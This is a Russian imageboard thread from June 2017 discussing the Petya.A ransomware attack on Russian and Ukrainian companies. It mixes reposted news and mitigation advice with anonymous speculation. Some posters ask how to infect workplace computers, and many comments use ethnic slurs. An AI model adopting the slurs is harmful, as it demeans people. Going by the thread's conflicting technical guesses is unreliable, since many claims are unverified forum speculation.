Главная Настройка Mobile Контакты NSFW Каталог Пожертвования Купить пасскод Pics Adult Pics API Архив Реквест доски Каталог стикеров Реклама
Доски


[Ответить в тред] Ответить в тред



[Назад][Обновить тред][Вниз][Каталог] [ Автообновление ] 223 | 21 | 61
Назад Вниз Каталог Обновить

Вирус-вымогатель PETYA.A поразил компьютеры Роснефти, Башнефти и украинских банков Аноним 27/06/17 Втр 17:17:25  1059279  
RRRAGE!

bitcoin[1].jpg (163Кб, 1280x1030)
b3c2671b-b0e6-4[...].jpg (163Кб, 1280x1030)
Днем 27 июня "Роснефть" сообщила о хакерской атаке на свои сервера. Одновременно с этим появилась информация об аналогичной атаке на компьютеры "Башнефти", "Укрэнерго", "Киевэнерго" и ряд других компаний и предприятий.

Вирус блокирует компьютеры и вымогает у пользователей деньги, он похож на вирус WannaCry, который в мае этого года атаковал компьютеры практически по всему миру.

https://twitter.com/RosneftRu/status/879665160012673024

https://twitter.com/RosneftRu/status/879665269135855617

Источник, близкий к одной из структур компании, отмечает, что все компьютеры в НПЗ "Башнефти", "Башнефть-добыче" и управлении "Башнефти" "единомоментно перезагрузились, после чего скачали неустановленное программное обеспечение и вывели на экран заставку вируса WannaCry". На экране пользователям было предложено перевести $300 в биткоинах по указанному адресу, после чего пользователям будет выслан ключ для разблокировки компьютеров на e-mail. Вирус, судя из описания, зашифровал все данные на пользовательских компьютерах.

"Ведомости"


"Национальный банк Украины предупредил банки и других участников финансового сектора о внешней хакерской атаке неизвестным вирусом на несколько украинских банков, а также на некоторые предприятия коммерческого и государственного секторов, что происходит сегодня.

В результате таких кибератак эти банки сложности с обслуживанием клиентов и осуществлением банковских операций".

Нацбанк Украины

Компьютерные системы столичной энергокомпании "Киевэнерго" подверглись хакерской атаке, сообщили агентству "Интерфакс-Украина" в компании.

"Мы подверглись хакерской атаке. Два часа назад вынуждены были выключить все компьютеры, ожидаем разрешения на включение от службы безопасности", – сказали в "Киевэнерго".

В свою очередь, в НЭК "Укрэнерго" агентству "Интерфакс-Украина" сообщили, что компания также столкнулась с проблемами в работе компьютерных систем, но они не являются критическими.

"Были некоторые проблемы с работой компьютеров. Но в целом все стабильно и контролировано. Выводы по инциденту можно будет сделать по итогам внутреннего расследования", – отметили в компании.

"Интерфакс-Украина"

Сети "Укрэнерго" и ДТЭК, крупнейших энергетических компаний Украины, оказались заражены новой формой вируса-шифровальщика, напоминающего WannaCry. Об этом TJ рассказал источник внутри одной из компаний, непосредственно столкнувшийся с атакой вируса.

По словам источника, днём 27 июня его компьютер на работе перезагрузился, после чего система якобы начала проверку жёсткого диска. После этого он увидел, что аналогичное происходит на всех компьютерах в офисе: "Я понял, что идёт атака, вырубил свой компьютер, а когда включил, была уже красная надпись про биткоин и деньги".

TJ

Компьютеры в сети компании логистических решений Damco также поражены. И в европейских, и в российских подразделениях. Охват заражения очень широкий. Известно, что в Тюмени, например, тоже всё похекано.

Но вернёмся к теме Украины: почти все компьютеры Запорожьеоблэнерго, Днепроэнерго и Днепровской электроэнергетической системы также заблокированы вирусной атакой.

Уточняем – это не WannaCry, но подобный по своему поведению зловред.

Роснефть Рязань НПЗ – отключили сеть. Тоже атака. Помимо Роснефти/Башнефти, атаки подверглись и другие крупные компании. Сообщается о проблемах в Mondelēz International, Ощадбанк, Mars, Новая Почта, Nivea, TESA и другие.

Вирус определен — это Petya.A. Petya.A жрёт жесткие диски. Он шифрует главную таблицу файлов (MFT) и вымогает деньги за расшифровку.

Киевский метрополитен также подвергся хакерской атаке. Атакованы правительственные компьютеры Украины, магазины Ашан, украинские операторы (Киевстар, LifeCell, УкрТелеКом), ПриватБанк. Поступают сообщения об аналогичной атаке на ХарьковГаз. По словам системного администратора, на машинах была установлена Windows 7 с последними обновлениями. Павел Валериевич Розенко, вице-премьер Украины, также подвергся атаке. Аэропорт Борисполь, предположительно, также подвергся хакерской атаке.

Телеграм-канал "Сайберсекьюрити и Ко.

27 июня, 16:27 От вируса Petya.A пострадали не менее 80 российских и украинских компаний, сообщил Валерий Баулин, представитель компании Group-IB, которая специализируется на раннем выявлении киберугроз.

"По нашим данным, в результате атаки с помощью вируса-шифровальщика Petya.A пострадали больше 80 компаний в России и на Украине", – сказал он. Баулин подчеркнул, что атака не связана с WannaCry.

Для прекращения распространения вируса нужно немедленно закрыть TCP-порты 1024–1035, 135 и 445, подчеркнули в Group-IB <...>

"Среди жертв кибератаки оказались сети "Башнефти", "Роснефти", украинских компаний "Запорожьеоблэнерго", "Днепроэнерго" и Днепровской электроэнергетической системы, также заблокированы вирусной атакой Mondelēz International, Ощадбанк, Mars, "Новая Почта", Nivea, TESA и другие. Киевский метрополитен также подвергся хакерской атаке. Атакованы правительственные компьютеры Украины, магазины Ашан, украинские операторы (Киевстар, LifeCell, УкрТелеКом), Приват Банк. Аэропорт "Борисполь", предположительно, также подвергся хакерской атаке", – указывает Group-IB.

Специалисты Group-IB также установили, что недавно шифровальщик Petya.А использовала группа Cobalt для сокрытия следов целевой атаки на финансовые учреждения.

RNS

http://varlamov.ru/2440873.html
Аноним 27/06/17 Втр 17:20:50  1059293
RRRAGE!

https://twitter.com/RosneftRu/status/879682706258440192
Аноним 27/06/17 Втр 17:20:51  1059295
RRRAGE! 3

Компы правительства Усраины зашифрованы:

https://lenta.ru/news/2017/06/27/pochti_wannacry/
Аноним 27/06/17 Втр 17:21:35  1059297
RRRAGE! 1

>>1059295

Ну вот и пизда хохлам!
Аноним 27/06/17 Втр 17:24:03  1059301
RRRAGE! 1

>>1059293
расстреливать на месте! как дидов диды
Аноним 27/06/17 Втр 17:24:51  1059304
RRRAGE!

image (1).jpg (18Кб, 300x300)
>2017
>правительственные компьютеры с выходом в интернет
>на винде
Аноним 27/06/17 Втр 17:26:13  1059307
RRRAGE!

Короче, как мне заразить компы у себя на работе?
Мимо коллектор
Аноним 27/06/17 Втр 17:27:11  1059310
RRRAGE! 1

>>1059304
Хохлуту же.
Аноним 27/06/17 Втр 17:27:37  1059312
RRRAGE! 1

>>1059307
Отсоси у программиста.
Аноним 27/06/17 Втр 17:27:55  1059313
RRRAGE!

>>1059307
"Если машина смотрит в интернет "белым" (маршрутизируемым) адресом и открыт 445 порт..."
Аноним 27/06/17 Втр 17:28:30  1059316
RRRAGE! 3

>>1059304
А что не так, даун?
Аноним 27/06/17 Втр 17:29:44  1059320
RRRAGE!

>>1059313
а если закрыт, где скачать вирус можно?)
Аноним 27/06/17 Втр 17:29:47  1059321
RRRAGE! 1

>>1059316
Хохол, спок.
Аноним 27/06/17 Втр 17:30:34  1059325
RRRAGE! 3

>>1059316
надо быть конченным, что бы в 2к17 году юзать винду.
Аноним 27/06/17 Втр 17:31:39  1059331
RRRAGE!

image.png (199Кб, 508x502)
>>1059295
проверка диска на ошибки вроде. иль нет? ангельский не знаю. только deutsch
Аноним 27/06/17 Втр 17:32:11  1059332
RRRAGE!

>>1059320
зачем тебе вирус если ты можешь взять и всё сломать без него
Аноним 27/06/17 Втр 17:32:27  1059334
RRRAGE!

>>1059331
вопрос отменяется. не прочел до конца там.
Аноним 27/06/17 Втр 17:32:55  1059336
RRRAGE!

>>1059331
да
Аноним 27/06/17 Втр 17:34:58  1059347
RRRAGE!

>>1059332
не получить пизды потом?
Аноним 27/06/17 Втр 17:37:14  1059360
RRRAGE!

phony-chkdsk-sc[...].png (105Кб, 720x440)
imagethumb8[1].png (32Кб, 613x321)
>>1059331
присмотрелся. на самом деле это фейковая проверка диска. а реально - шифрование его. в норме другие надписи
Аноним 27/06/17 Втр 17:38:38  1059368
RRRAGE!

>>1059304
На XP скорее всего, причем.
Аноним 27/06/17 Втр 17:39:06  1059371
RRRAGE! 1

>>1059332
Самый страшный вирус - хохлушка за компом.
Ахтунг!! Аноним 27/06/17 Втр 17:42:05  1059382
RRRAGE! 1

В сети была инфа, что на pastebin утекли архивы топов роснефти. Доставьте ссылку на эти архивы
Аноним 27/06/17 Втр 17:44:10  1059387
RRRAGE! 2

>>1059382
За щекой проверяй
Аноним 27/06/17 Втр 17:52:50  1059419
RRRAGE! 1

>>1059325
>Я скозал!
Аноним 27/06/17 Втр 17:54:43  1059429
RRRAGE!

>>1059325
ну, да, лучше сборочку линя накатить и и держать маня-контору для ее поддержки
Аноним 27/06/17 Втр 17:54:48  1059430
RRRAGE! 1

>>1059419
Вирусы-шифровальщики скозали)
Аноним 27/06/17 Втр 17:57:12  1059445
RRRAGE!

>>1059347
есть такая версия:

Вирус Petya.A чаще всего распространяется через спам-сообщения электронной почты, содержащие ссылки на скачивание файлов с Dropbox под названием "приложение folder-gepackt.exe". Когда файл загружается и открывается, активируется вирус.
Аноним 27/06/17 Втр 17:59:54  1059459
RRRAGE!

>>1059445
>gepackt

Немцы?
Аноним 27/06/17 Втр 18:00:43  1059463
RRRAGE!

>Башнефти
>Роснефти
>украинских банков
Дайте угадаю, выглядит это так - все эти необучаемые уебки сидят на сперме образца эдак 2012-года, где стоит только ихнее кустарное ПО, какое-нибудь 1с и больше нихуя.
Аноним 27/06/17 Втр 18:01:59  1059471
RRRAGE!

>>1059445
лел, качать exe файлы в 2к17
Аноним 27/06/17 Втр 18:02:45  1059475
RRRAGE!

>>1059471
пока путь заражения толком никто не знает. ждём
но нашёл за прошлый год ещё про эту петю статейки

http://bedynet.ru/petya-вирус/
Аноним 27/06/17 Втр 18:04:21  1059485
RRRAGE! 6

Чекайте баланс онлайн
https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX?sort=0
Аноним 27/06/17 Втр 18:04:46  1059488
RRRAGE!

>>1059475
Так мы и перешли по твоей сслыке, рыбак.
Аноним 27/06/17 Втр 18:05:45  1059496
RRRAGE!

>>1059488
за щекой поищи рыбаков
я её спрятал кагбе
Аноним 27/06/17 Втр 18:06:54  1059503
RRRAGE!

>спермопроблемы
Аноним 27/06/17 Втр 18:08:38  1059513
RRRAGE!

>>1059485
хуйпизда!11!
Аноним 27/06/17 Втр 18:08:50  1059514
RRRAGE!

Мало платите - получайте хуёвых работников. Может дойдёт до руководства, что лучше лишний лям не себе в офшор, а на нормальных админов потратить.
Аноним 27/06/17 Втр 18:09:07  1059517
RRRAGE!

Уже биткоин накидали.
Аноним 27/06/17 Втр 18:11:33  1059529
RRRAGE!

Меня эито вобще должно как то беспокоить? Роснефть еще что то там, да гори оно все синим пламенем.
Аноним 27/06/17 Втр 18:14:19  1059550
RRRAGE! 1

>>1059279 (OP)
Что за аутист писал тексты на скринах? Явно не в ладах с инглишем.
Аноним 27/06/17 Втр 18:16:31  1059564
RRRAGE!

>предложено перевести $300 в биткоинах по указанному адресу
Теперь надеюсь всем понятно для чего нужен БИТОК?
Аноним 27/06/17 Втр 18:17:07  1059569
RRRAGE!

>>1059550
Нормально там всё, я смог перевести текст.
Аноним 27/06/17 Втр 18:17:36  1059572
RRRAGE!

>>1059564
майнеры поднимают стоимость биткоина
Аноним 27/06/17 Втр 18:17:52  1059574
RRRAGE!

>>1059564
Для преступников.
Аноним 27/06/17 Втр 18:19:18  1059582
RRRAGE!

>>1059564
>юсь всем понятно для чего нужен БИТ
>>1059572
Я майнир, у миня кредит, курс падает. А заебошука я вирус.
Аноним 27/06/17 Втр 18:19:19  1059583
RRRAGE!

>>1059574
намекаешь что биток будет следующим после телеграммы этой вашей?
Аноним 27/06/17 Втр 18:20:01  1059589
RRRAGE!

1326657233841 -[...].jpg (86Кб, 615x436)
>>1059279 (OP)
Блять, я не пойму, у них что там, вся Роснефть одновременно кликала по ссылка и скачивала эту парашу?
Аноним 27/06/17 Втр 18:20:58  1059595
RRRAGE!

>>1059583
Да. Но параллельно власти создадут крипторубль и разрешат только его.
Аноним 27/06/17 Втр 18:20:59  1059596
RRRAGE!

>>1059589
А может у них локалка, м?
Аноним 27/06/17 Втр 18:21:09  1059598
RRRAGE!

>>1059589
есть версия что кликнул кто-то один. а оно разошлось по сети через дыры.
пока толком ничего не известно
Аноним 27/06/17 Втр 18:21:48  1059603
RRRAGE!

>>1059598
А прикол это сисадмин случайно кликнул, когда порнуху смотрел.
Аноним 27/06/17 Втр 18:21:59  1059604
RRRAGE!

>>1059595
>крипторубль
Курс которого будет ниже рубля
Аноним 27/06/17 Втр 18:22:30  1059606
RRRAGE!

>>1059596
Ну так и хули, у них что там, все компы в сети с правами администратора?
Аноним 27/06/17 Втр 18:23:11  1059611
RRRAGE!

>>1059603
Потому я смотрю порнуху с виртуалки.
мимоадмин
Аноним 27/06/17 Втр 18:24:21  1059618
RRRAGE!

>>1059606
зная какие там порядки (непонаслышке) - да. вполне вероятно. админ заебётся в случае чего бегать по всем абиснять куда жать если что-то не работает. проще сразу права дать
Аноним 27/06/17 Втр 18:25:20  1059623
RRRAGE!

>>1059611
Как к тебе коллеги относятся? Или вспоминают только когда что-то наебнётся?
Аноним 27/06/17 Втр 18:26:31  1059635
RRRAGE!

>>1059604
И майнтиь его можно только на эльбрусе.
Аноним 27/06/17 Втр 18:26:54  1059638
RRRAGE!

прикиньте какая сейчас чистка бурситетских сис админов пойдет....
Аноним 27/06/17 Втр 18:27:34  1059645
RRRAGE!

>>1059635
ору
Аноним 27/06/17 Втр 18:28:11  1059651
RRRAGE!

>>1059635
эльбрусы раскупят враз
Аноним 27/06/17 Втр 18:29:15  1059661
RRRAGE!

>>1059651
нахера, курс же меньше рубля
Аноним 27/06/17 Втр 18:29:32  1059664
RRRAGE!

>>1059651
и таки где эти ваши эльбрусы можно раскупить?
Аноним 27/06/17 Втр 18:29:55  1059666
RRRAGE!

>>1059589
>В блоге «Лаборатории Касперского» появилась публикация с информацией о том, как происходит заражение. По словам автора, вирус распространяется в основном через HR-менеджеров, так как письма маскируются под сообщение от кандидата на ту или иную должность.
«HR-специалист получает фальшивое письмо со ссылкой на Dropbox, по которой якобы можно перейти и скачать «резюме». Вот только файл по ссылке является не безобидным текстовым документом, а самораспаковывающимся архивом с расширением .EXE», — рассказывает эксперт.
После открытия файла пользователь видит «синий экран смерти», после которого Petya.A блокирует систему.
Аноним 27/06/17 Втр 18:31:56  1059682
RRRAGE!

>>1059666
Ну у них же должен стоять бесплатный аваст хотя-бы.
Аноним 27/06/17 Втр 18:33:41  1059692
RRRAGE!

>>1059360
Двачаю. Не видел чтобы во время проверки нельзя было вырубать.
Аноним 27/06/17 Втр 18:33:52  1059693
RRRAGE!

>>1059682
>Ну у них же должен стоять бесплатный аваст хотя-бы.
>Пидорашки
>Антивирус
Слишком заумно
Аноним 27/06/17 Втр 18:34:38  1059694
RRRAGE!

https://blog.kaspersky.ru/secure-dropbox-alternatives/17837/
Аноним 27/06/17 Втр 18:34:57  1059696
RRRAGE!

>>1059682
не спасет. Его только Касперский видит и то вряд ли.
Аноним 27/06/17 Втр 18:35:55  1059698
RRRAGE!

>>1059694
фиксую.это не то
Аноним 27/06/17 Втр 18:36:27  1059701
RRRAGE!

>>1059293
Охуеть, Роснефть уже взяли на себя судебные функции
Аноним 27/06/17 Втр 18:36:37  1059702
RRRAGE!

>>1059682
Щас эксперты из /s/ пояснят что
>2017
>антивирус
Аноним 27/06/17 Втр 18:37:01  1059704
RRRAGE!

file.jpg (74Кб, 600x579)
>>1059666
>не переходить по внешним ссылкам
>смотреть на расширение файла
Аноним 27/06/17 Втр 18:37:03  1059705
RRRAGE!

Офисный планктон из одной компании подвергшейся атаке репортинг ин. Минут за десять наебнулась вся локалка в офисе (компов 15-20). Я в этот момент делал отчетик, ничего не качал весь день, так что распространение наверно может идти и через один комп. Появилось сообщение, что комп выключится через минуту, поптом фейковый чек диск и красный шрифт со скринов выше. Шарящие аноны подскажите, данным реально пизда? И никак не восстановить? У айтишника нехило припекло кстати.
Аноним 27/06/17 Втр 18:38:31  1059709
RRRAGE!

>>1059704
государство много лет работает на то чтобы самых тупых, лояльных и послушных даунов поднять наверх. а ты чему-то удивляешься
Аноним 27/06/17 Втр 18:38:40  1059710
RRRAGE!

>>1059705
>И никак не восстановить?
Не, ну в принципе можно, только подбор ключа займёт пару лет.
Аноним 27/06/17 Втр 18:38:49  1059711
RRRAGE!

>>1059705
> Появилось сообщение, что комп выключится через минуту,
анальная 10-ка?
Аноним 27/06/17 Втр 18:41:57  1059722
RRRAGE!

14983029221180.gif (45Кб, 389x259)
>>1059279 (OP)
> Petya.A жрёт жесткие диски
Всё что я хотел увидеть. Спасибо.
Аноним 27/06/17 Втр 18:43:13  1059727
RRRAGE!

>>1059705
есть кое-какие бестолковые инструкции про то как вернуть комп к жизни. в частности восстановление сделать (или руками реестр вернуть). либо загрузочную запись пофиксить. но это всё не поможет при расшифровке файлов.
Аноним 27/06/17 Втр 18:43:45  1059729
RRRAGE!

>>1059293
напоминает гифку, где собака бросалась на свою заднюю лапу.
Аноним 27/06/17 Втр 18:44:07  1059730
RRRAGE!

>>1059694
>от 59$
>48 долларов в год
>От 96 долларов
Уноси это говно. Юзаю веракрипт и гуглдрайв - 0 в год, брат жив.
Аноним 27/06/17 Втр 18:44:36  1059732
RRRAGE!

>>1059730
это было не в тему
Аноним 27/06/17 Втр 18:46:40  1059743
RRRAGE!

>>1059293
В комментах троллеркоастер.
Аноним 27/06/17 Втр 18:51:55  1059769
RRRAGE!

>>1059711Семерка у всего офиса
Аноним 27/06/17 Втр 18:53:13  1059778
RRRAGE!

По факту.
1. Уязвимы ВСЕ OS Windows, включая 10-ку с последними обновлениями
2. Распространяется молниеносно по сети, явно эксплуатируя SMB уязвимость.
3. Антивирусные компании решений пока не предоставили (NOD, Symantec, Fortinet), есть подтвержденные (лично) заражения ПК с решениями от данных компаний. Некоторые публичные ресурсы этих компаний — вообще лежат, например fortiguard.com.
4. Действительно шифрует MBR, GPT вроде бы не трогает. Оставляет на локальных дисках файл readme с текстом, аналогичном выводимому при загрузке. Несистемные диски (в т.ч. сетевые) — НЕ шифрует.
5. При перезагрузке выводит имитацию checkdisk.
Аноним 27/06/17 Втр 18:53:18  1059780
RRRAGE! 1

>>1059430
Дети в е ещё не понимают, что такое количество вирусов под винду обусловлено лишь её популярностью, был бы популярен линукс, каждый день на нулевой были бы треды о шифровальщиках под линукс.
Аноним 27/06/17 Втр 18:53:48  1059783
RRRAGE!

>>1059769
кстати про минуту. такая же хуйня была с WANNACRY. признак заражения через SMB
Аноним 27/06/17 Втр 18:55:14  1059788
RRRAGE!

>>1059463
нет, нужно накатывать ежедневно 50 обновлений и патчей, на последней версии 10 ?
Аноним 27/06/17 Втр 18:55:42  1059790
RRRAGE!

>>1059769
заплатку после эпидемии WANNACRY ставили? или всем похуй как всегда?
Аноним 27/06/17 Втр 18:57:52  1059804
RRRAGE!

>>1059778
Сегодня в бухгалтерии заразилось три компа, два из которых при включений ругались на отсутствие системного диска. Третий же включался с красным экраном вымогателя. КОгда зашел на него с Live CD, увидел пустые диски. На тех двух компах стояли MSE, которые, похоже, уничтожили вирус. Никаких записок нет. Повреждены все документы и часть БД бухгалтерского софта. На эти три ПК за последние сутки ничего не качалось. Есть подозрение, что заражение произошло через один из бухгалтерских софтов.
Аноним 27/06/17 Втр 18:58:38  1059809
RRRAGE! 1

>>1059279 (OP)
Да уже не банков, лол, в украшке только что распространили сообщение вырубить все компьютеры к хуям, у них там от метрополитена и аэропортов до укэнерго и мвд атакованы.

Хохлы уже успели заявить, что "не вызывает сомнений, что атаку организовал Путин, потому что мы находимся в состоянии гибридной войны", лол.

Украшки в очередной раз показали себя как пидорашки. Большая пыня им вместо европейских ценностей сулит. Пидорашки не меняются, даже если они в Украине.
Аноним 27/06/17 Втр 18:58:43  1059811
RRRAGE! 2

>>1059780
Зачем пиздеть о том в чем не разбираешься?
Аноним 27/06/17 Втр 18:59:20  1059814
RRRAGE!

>>1059778
>включая 10-ку с последними обновлениями
Либо это ебаный пиздежь, либо соснут ВСЕ.
Аноним 27/06/17 Втр 18:59:28  1059815
RRRAGE!

>>1059293
ВОЛОДИН НЕ ГЕЙ Я СКОЗАЛ! ПРЕКРАТИТЕ НЕМЕДЛЕННО!
Аноним 27/06/17 Втр 19:00:32  1059820
RRRAGE!

>>1059809
Заражены компы, на которых установлен бухгалтерский софт.
Аноним 27/06/17 Втр 19:01:47  1059829
RRRAGE!

>>1059820
а остальные точно такие же но без бухгалтерского софта не заражены да?
Аноним 27/06/17 Втр 19:02:13  1059830
RRRAGE!

>>1059804
>и часть БД бухгалтерского софта
так вам и надо, дауны.
базы не должны там находиться. как и документы.
сэкономили на правильном админе - сосите хуй.
Аноним 27/06/17 Втр 19:02:44  1059836
RRRAGE!

14577002742020.png (121Кб, 736x736)
>>1059820
Дай угадаю? 1с? Хохол не палится
Аноним 27/06/17 Втр 19:05:22  1059857
RRRAGE!

Представители "Мегафона" заявили, что не выявили заражения новой вредоносной программой. Услуги связи оказываются оператором в полном объеме.

Аналогичную информацию озвучили в пресс-службе "Вымпелкома" и Tele2. Сети МТС также работают в штатном режиме. Представители компании подчеркнули, что оператор обладает глубокой экспертизой в защите от киберугроз.

Ранее сообщалось, что вирус-вымогатель Petya.A атаковал нефтяные, телекоммуникационные и финансовые компании РФ и Украины. Программа блокирует компьютеры и требует 300 долларов в биткоинах за восстановление доступа к файлам. Среди жертв вирусной атаки оказались "Роснефть", "Башнефть", Mars, Nivea и производитель шоколада Alpen Gold Mondelez International.

По данным представителей международной исследовательской команды "Лаборатории Касперского" вирус распространился не только в России и на Украине, но и по всему миру
Аноним 27/06/17 Втр 19:05:26  1059859
RRRAGE!

Ребят, не шарю в этих вещах, но могу ли я заиметь петю через торрент? Качаю сейчас игрушку и чет очко жмется
Аноним 27/06/17 Втр 19:05:27  1059860
RRRAGE!

>>1059829
Да. С моей пекарней все ок.
>>1059836
Это тоже, но как ни странно, базы 1с не затронуло, зато документы, находящиеся в папке с базой, зашифровались.
Аноним 27/06/17 Втр 19:06:43  1059867
RRRAGE!

>>1059829
твой комп залатан от wannacry?
а бухгалтерские компы залатаны? ~были~
Аноним 27/06/17 Втр 19:07:46  1059874
RRRAGE!

>>1059860
>Да. С моей пекарней все ок.
Еще бы ты как то пруфы предоставил и я бы спал спокойно.
Аноним 27/06/17 Втр 19:08:34  1059881
RRRAGE!

>>1059859
Разумеется, в кряк подсунуть вместо экзешника. Ты еще и сам антивирусник вырубишь, когда всплывет просьба.

И вообще ничего качать ничего не надо, достаточно иметь открытый порт и уязвимость, которую ты разумеется не пофиксил, потому что обновляешь шиндоус раз в год. Так что не ссы, оно само тебя найдет.
Аноним 27/06/17 Втр 19:09:32  1059886
RRRAGE!

>>1059867
На всех стоит одинаковая семерка.
>>1059874
Пруфы чего? Крякозябров в doc и xls файлов? Так я не на работе уже, лол.
Аноним 27/06/17 Втр 19:10:33  1059890
RRRAGE!

>>1059881
ну так я сейчас докачаю, офну адаптер и все. Просканирую антивирусом папку
Аноним 27/06/17 Втр 19:10:34  1059891
RRRAGE!

>>1059886
весь вопрос в том насколько одинаковая
Вирус-вымогатель Petya поразил Чернобыльскую АЭС Аноним 27/06/17 Втр 19:11:14  1059894
RRRAGE!

Всем приготовиться
Аноним 27/06/17 Втр 19:12:16  1059901
RRRAGE!

>>1059891
Вообще одинаковая. Даже шара. У меня только 1с и прочего бух говна нет.
Аноним 27/06/17 Втр 19:12:20  1059902
RRRAGE!

Ебать какая мощная хакерская атака, пиздец просто. Это они ещё с по от майл ру не боролись.
Аноним 27/06/17 Втр 19:13:15  1059906
RRRAGE!

>>1059894
Сталкер 2 на подходе.
Аноним 27/06/17 Втр 19:13:23  1059907
RRRAGE!

>>1059790Уверен что нашему айтишнику было похуй, вот видимо у него и припекло знатно.
Аноним 27/06/17 Втр 19:13:28  1059909
RRRAGE!

>>1059894
я медленно надеваю хим защитный костюм
Аноним 27/06/17 Втр 19:14:10  1059914
RRRAGE!

>>1059906
Нехуйственно маркетологи пиар ему мутят.
Аноним 27/06/17 Втр 19:15:02  1059916
RRRAGE!

>>1059894
Бре-хня!
АЭС по "ГОСТу" не имеют контактов с сетью Internet. Они ПОЛНОСТЬЮ АВТОНОМНЫ.
Аноним 27/06/17 Втр 19:15:32  1059919
RRRAGE! 1

>>1059894
Хохлы под шумок угрожают и клянчат денег.
Аноним 27/06/17 Втр 19:15:59  1059920
RRRAGE!

>>1059916
То-то мой кореш ебашит в дотку на ночном дежурстве на чаэс.
Чернобыльская АЭС также подверглась кибератаке Аноним 27/06/17 Втр 19:16:34  1059926
RRRAGE!

>>1059916
http://www.interfax.ru/world/568282
Аноним 27/06/17 Втр 19:17:40  1059932
RRRAGE!

14983886051180.jpg (41Кб, 571x574)
>>1059926
>Чернобыльская АЭС также подверглась кибератаке
>В связи с кибератакой не работает сайт Чернобыльской АЭС.
Дело нешуточное, блядь.
Аноним 27/06/17 Втр 19:20:05  1059943
RRRAGE!

https://twitter.com/MrCarlMcDade/status/879706580127809536
>rar
Анон, прячь свои паки с цп.
Аноним 27/06/17 Втр 19:21:19  1059947
RRRAGE!

>>1059943
Я думал погромисты умные люди и так не расписывают свои вирусы.
СБУ (якобы) установила источник вируса Petya Аноним 27/06/17 Втр 19:21:32  1059949
RRRAGE!

Служба безопасности Украины установила источник вируса Petya, поразившего госучреждения и украинские компании во вторник.

Об этом спецслужба сообщает в Facebook.

«По данным СБУ, подавляющее большинство заражений операционных систем происходила через открытие вредоносных приложений (документов Word, PDF-файлов), которые были направлены на электронные адреса многих коммерческих и государственных структур», — сказано сообщении.

Атака использовала сетевую уязвимость MS17−010, в результате эксплуатации которой на инфицированную машину устанавливался набор скриптов, используемых злоумышленниками для запуска шифровальщика файлов Petya.A.

«Вирус атакует компьютеры под управлением ОС Microsoft Windows путем шифрования файлов пользователя, после чего выводит сообщение о преобразовании файлов с предложением произвести оплату ключа дешифрования в биткоинах в эквиваленте суммы $ 300 для разблокировки данных. На сегодня зашифрованные данные, к сожалению, расшифровке не подлежат», — сказано в сообщении.
Аноним 27/06/17 Втр 19:22:34  1059953
RRRAGE!

>>1059949
Не вижу слова РОССИЯ
Аноним 27/06/17 Втр 19:23:18  1059960
RRRAGE!

Стикер (63Кб, 512x512)
Есть какие-то догадки, из какой страны гадят?
Аноним 27/06/17 Втр 19:23:20  1059961
RRRAGE!

>>1059953
ну сначала кукарекнули традиционно. а потом стали разбираться
напоминаю. MS17−010 = дыра через которую залазил WANNACRY Аноним 27/06/17 Втр 19:24:06  1059963
RRRAGE!

.
Аноним 27/06/17 Втр 19:28:25  1059982
RRRAGE!

>>1059960
Зависит от страны проживания.
Аноним 27/06/17 Втр 19:29:11  1059987
RRRAGE!

>>1059960
ПИдорахии же.
Аноним 27/06/17 Втр 19:29:40  1059994
RRRAGE!

Депутат Верховной Рады и советник министра внутренних дел Антон Геращенко утверждает, что письма с вирусом, поразившим украинские компание и учреждений, приходили им в течение месяца.
Аноним 27/06/17 Втр 19:30:01  1059996
RRRAGE!

image.png (114Кб, 830x992)
>>1059360
О точно фейк
Аноним 27/06/17 Втр 19:30:19  1059999
RRRAGE! 1

>>1059960
Тупые хохлы сами себе проблемы создают.
Аноним 27/06/17 Втр 19:35:40  1060015
RRRAGE!

>>1059943
Т.е. если я сделаю бэкап анимы архивом, а потом переименую его в ANUIDISUDA.UBLUDOKMATTVOU, то шифровальщику будет похуй на этот файл?
Аноним 27/06/17 Втр 19:36:45  1060018
RRRAGE!

>>1060015
>>1059778
Аноним 27/06/17 Втр 19:37:10  1060020
RRRAGE!

RansomwarePetya.webm (4143Кб, 1280x720, 00:00:23)
>>1059804
такой?
Аноним 27/06/17 Втр 19:37:47  1060023
RRRAGE!

>>1060015
Да. У бухов осталось куча бэкапов, сделанных именно таким способом.

Мимо все тот же счастливчик, у которого три бухгалтерши подцепили вирус в одно и то же время.
Аноним 27/06/17 Втр 19:38:47  1060028
RRRAGE!

>>1060020
Типа того, но подозрительных .exe файлов не запускалось. Фейковое окно проверки диска точно такое же. "Проверка" длилась минут 20.
Аноним 27/06/17 Втр 19:38:53  1060030
RRRAGE!

>>1060015
возможно. НИЗНАЮ ЯНЕ ХАКИР
Аноним 27/06/17 Втр 19:39:28  1060033
RRRAGE!

>>1059589
например wannacry.a может путешествовать по сети по 445 порту.
Аноним 27/06/17 Втр 19:40:00  1060035
RRRAGE!

>>1059814
Кроме линуксобогов.
Аноним 27/06/17 Втр 19:40:24  1060038
RRRAGE!

>>1060028
видео ускорено. а вирус замаскирован под само распаковывающийся архив. который обычный .exe
Аноним 27/06/17 Втр 19:40:58  1060040
RRRAGE!

>>1060038
по крайней мере вирус 2016 года.
А это уже модификация походу того вируса.
Аноним 27/06/17 Втр 19:41:55  1060043
RRRAGE!

>>1060023
есть версия почему не заразился ты а заразились они. они РАНЕЕ могли нажимать на заразу. а активаровалась она только сейчас. Геращенко говорит про это
(это если заражение не через SMB пошло)
Аноним 27/06/17 Втр 19:47:56  1060066
RRRAGE!

Хули все ссыкуют петю ? Юзлесс кусок дерьма, удалить которое нет проблем, просто долбоебы раздули про суперхуцкеров, ибо сами обсераются увидев окошко выбора после некорректного выключения пк.
Аноним 27/06/17 Втр 19:59:04  1060100
RRRAGE!

Чет читнул тред, ни одного совета по превентивной защите. Что делать-то: 3 порта закрыть и скачать обнову, которую пару месяцев назад рекомендовали скачать везде? Или еще что-то?
Аноним 27/06/17 Втр 19:59:57  1060104
RRRAGE!

>>1060043
Документы на двух ПК зашифровались в одно и то же время (с точностью до секунды). В логе антивируса указано, что он успешно удалил Petya.A за пару минут до изменения документов. Повторные сканирования ничего не нашли. Вряд ли антивирус молчал бы несколько дней. В истории скачивания ни одного exe за месяц.
Аноним 27/06/17 Втр 20:00:09  1060105
RRRAGE!

>>1060100
Ничего не делай, кому твой пк нужен ?
Аноним 27/06/17 Втр 20:00:44  1060109
RRRAGE!

>>1059778
